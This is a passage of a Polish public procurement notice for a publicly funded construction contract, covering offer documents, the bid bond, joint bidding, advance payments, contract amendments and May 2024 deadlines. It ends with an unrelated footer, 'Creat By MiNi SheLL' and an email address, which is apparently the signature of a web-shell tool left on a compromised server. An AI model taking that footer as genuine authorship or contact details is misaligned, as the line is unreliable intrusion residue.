</h3> 1. W terminie składania ofert określonym w Rozdziale 11 SWZ wykonawca zobowiązany jest złożyć Zamawiającemu Ofertę zawierającą:<br/>1) formularz ofertowy (według załącznika nr 1 do SWZ);<br/>2)	oświadczenie własne wykonawcy dotyczące spełniania warunków udziału w postępowaniu oraz niepodlegania wykluczeniu składane na podstawie art. 125 ust. 1 ustawy Pzp (według załącznika nr 4 do SWZ);<br/>3)	oświadczenie składane na podstawie art. 125 ust. 1 ustawy Pzp dotyczące spełniania warunków udziału w postępowaniu oraz niepodlegania wykluczeniu dla każdego z podmiotów na zasobach, których Wykonawca polega (według załącznika nr 4 do SWZ), o ile wykonawca polega na zasobach innych podmiotów;<br/>4)	oświadczenie składane na podstawie art. 125 ust. 1 ustawy Pzp dotyczące spełniania warunków udziału w postępowaniu oraz niepodlegania wykluczeniu dla każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia, w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (według załącznika nr 4 do SWZ), o ile oferta jest składana przez wykonawców wspólnie ubiegających się o zamówienie;<br/>5)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (według załącznika nr 8 do SWZ);<br/>6)	zobowiązanie podmiotu udostępniającego zasoby (według załącznika nr 7 do SWZ), jeżeli wykonawca wykazując spełnienie warunków udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów;<br/>7)	dowód wniesienia wadium.<br/>2. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od wykonawcy dołączenia do oferty odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>3. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 2, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, i wykonawca wskaże w oświadczeniu, o którym mowa w ust.1 pkt.2 dane umożliwiające dostęp do tych dokumentów.<br/>4. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ust.2, Zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>5. Wymóg określony w ust.2-4 stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>6. Wymóg określony w ust.2-4 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga złożenia wadium przed upływem terminu składania ofert w wysokości 15.000,00 złotych (słownie: piętnaście tysięcy złotych i 00/100).<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu na rachunek Zamawiającego w Banku Spółdzielczym w Sochaczewie nr: 19 9283 0006 0011 2934 2000 0090;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Szczegółowe informacje dotyczące wadium są zawarte w Rozdziale 20 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się o udzielenie zamówienia (np. konsorcja, spółki cywilne).<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>4) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5) W przypadku, o którym mowa wyżej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/>6) Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowania o zamówienie<br/>publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika<br/>oraz zakres jego umocowania. W imieniu tych wykonawców powinny działać osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej lub innym właściwym rejestrze.<br/>7) Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako pełnomocnik.<br/>8) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) żaden z tych Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale 12 i 13 SWZ,<br/>b) warunki udziału w postępowaniu określone w ust.2 niniejszego rozdziału winny zostać potwierdzone w sposób określony<br/>w Rozdziale 17 SWZ.<br/>9) Celem wykazania braku podstaw do wykluczenia, o których mowa w o których mowa w Rozdziale 12 i 13 SWZ oraz<br/>spełnienia warunków udziału w postępowaniu o których mowa w ust. 2, Wykonawcy składają oświadczania i dokumenty<br/>określone w Rozdziale 18 SWZ, w sposób i w trybie tam określonym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający zobowiązuje się do udzielenia Wykonawcy zaliczki w wysokości stanowiącej 2% należnego Wykonawcy wynagrodzenia. Warunkiem przekazania zaliczki jest złożenie przez Wykonawcę do Zamawiającego wniosku o wypłatę zaliczki, protokolarne przejęcie placu budowy w sposób określony w § 5 ust. 2 pkt. 4 umowy i potwierdzenie rozpoczęcia prac budowlanych przez inspektora nadzoru Zamawiającego wpisem do dziennika budowy oraz wystawienie faktury zaliczkowej obejmującej kwotę udzielonej zaliczki. Zaliczka zostanie wypłacona przez Zamawiającego nie wcześniej niż w sierpniu 2024 r. oraz nie później niż do dnia 20 grudnia 2024 r. Szczegółowe informacje na temat zaliczek są zawarte w § 4 umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany umowy mogą nastąpić jedynie na podstawie okoliczności, o których mowa w art. 455 ustawy Pzp, oraz okoliczności wskazanych w umowie.<br/>2. Jeżeli Siła Wyższa uniemożliwia lub uniemożliwi jednej ze Stron wywiązanie się z jakiegokolwiek zobowiązania objętego Umową, Strona ta zobowiązana jest niezwłocznie, nie później jednak niż w terminie dwóch dni od wystąpienia Siły Wyższej, zawiadomić drugą Stronę na piśmie o wydarzeniu lub okolicznościach stanowiących Siłę Wyższą wymieniając przy tym zobowiązania, z których nie może lub nie będzie mogła się wywiązać oraz wskazując przewidywany okres, w którym nie będzie możliwe wykonywanie Umowy. Powinna także podjąć działania niezbędne do zminimalizowania skutków działania Siły Wyższej oraz czasu jej trwania.<br/>3. W wypadku zaistnienia Siły Wyższej o charakterze długotrwałym, powodującej niewykonywanie Umowy przez okres dłuższy niż 15 dni, Strony będą prowadzić negocjacje w celu określenia dalszej realizacji lub rozwiązania Umowy.<br/>4. W przypadku urzędowej zmiany stawki podatku VAT w trakcie obowiązywania umowy, wynikającej ze zmiany ustawy o podatku od towarów i usług oraz podatku akcyzowego Wykonawca jest uprawniony do wystąpienia do Zamawiającego z wnioskiem zawierającym uzasadnienie konieczności zmiany umowy w zakresie wynagrodzenia określonego w § 3 ust. 1 umowy w terminie 7 dni o zaistnieniu ww. sytuacji.<br/>5. Wykonawca jest uprawniony do wystąpienia do Zamawiającego o zmianę wynagrodzenia określonego § 3 ust. 1 umowy, z powodu błędów w Dokumentacji. <br/>6. Strona może wystąpić z wnioskiem do drugiej Strony zawierającym propozycję zmiany sposobu wykonania przedmiotu zamówienia, jeżeli te zmiany będą korzystne dla Zamawiającego. <br/>7. Zamawiający przewiduje zmianę postanowień umowy w razie zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia jednej lub obu stron. Zmiana przedmiotowej umowy może dotyczyć terminu wykonania zamówienia o którym mowa w § 2 ust. 1 umowy oraz wysokości wynagrodzenia o którym mowa w § 3 ust. 1 umowy.<br/>8. W razie udzielenie przez Zamawiającego innego zamówienia istotnie wpływającego na termin realizacji niniejszej umowy Strona powołująca się na tę okoliczność zobowiązana jest powiadomić drugą stronę w terminie 7 dni o zaistnieniu ww. sytuacji i jej wpływie na dalszy przebieg robót budowlanych, pod rygorem wygaśnięcia roszczenia. Zmiana przedmiotowej umowy może dotyczyć wyłącznie terminu wykonania zamówienia o którym mowa w § 2 ust. 1 umowy.<br/>9. Szczegółowy zakres zmian umowy jest określony w projektowanych postanowieniach umowy (§ 20).<br/>10. Zgodnie z art. 439 Pzp wynagrodzenie należne Wykonawcy za wykonanie Umowy może ulec zmianie w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia przy zachowaniu zasad określonych w §21 umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-28 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-25</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Postępowanie jest prowadzone w trybie podstawowym, na podstawie art. 275 pkt. 2 ustawy Pzp, w którym Zamawiający<br/>może prowadzić negocjacje w celu ulepszenia treści ofert, które podlegają ocenie w ramach kryteriów oceny ofert, a po zakończeniu negocjacji zaprasza wykonawców do składania ofert dodatkowych. Zamawiający może dokonać wyboru najkorzystniejszej oferty bez przeprowadzenia negocjacji lub po przeprowadzeniu negocjacji, zgodnie z zasadami określonymi w Rozdziale 2 SWZ. 2. Wykluczeniu z postępowania podlega wykonawca lub którykolwiek ze wspólników konsorcjum (w przypadku składania oferty wspólnej) lub podmiot, na którego zasoby powołuje się wykonawca w celu spełnienia warunków udziału w postępowaniu, wobec którego zachodzą przesłanki wykluczenia z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (obligatoryjne podstawy wykluczenia). 3. Dysponowanie zasobami innych podmiotów: 1). Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. 2). W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane. 3). Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. 4). Pozostałe informacje w tym zakresie określone są w Rozdziale 17 SWZ. 4. Przedmiotowe zadanie jest dofinansowane z programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com